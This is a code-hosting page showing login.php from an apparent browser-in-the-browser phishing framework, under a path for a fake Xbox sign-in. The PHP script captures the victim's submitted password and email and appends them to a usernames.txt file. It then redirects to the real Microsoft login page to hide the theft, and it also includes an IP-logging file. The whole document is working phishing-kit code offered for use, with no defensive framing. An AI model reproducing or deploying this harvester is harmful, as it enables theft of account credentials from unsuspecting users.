Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
surya-dev-singh
GitHub Repository: surya-dev-singh/bitb-framwork
Path: blob/main/sites/yandex/xbox/login.php
1050 views
1
<?php
2
include 'ip.php';
3
session_start();
4
$pass = $_POST["passwd"];
5
$email=$_SESSION["Email"];
6
file_put_contents("../userpass/usernames.txt", "Xbox Username: " . $email . " Pass: " . $pass . "\n", FILE_APPEND);
7
header('Location: https://login.live.com/login.srf');
8
exit();
9
session_destroy();
10
?>
11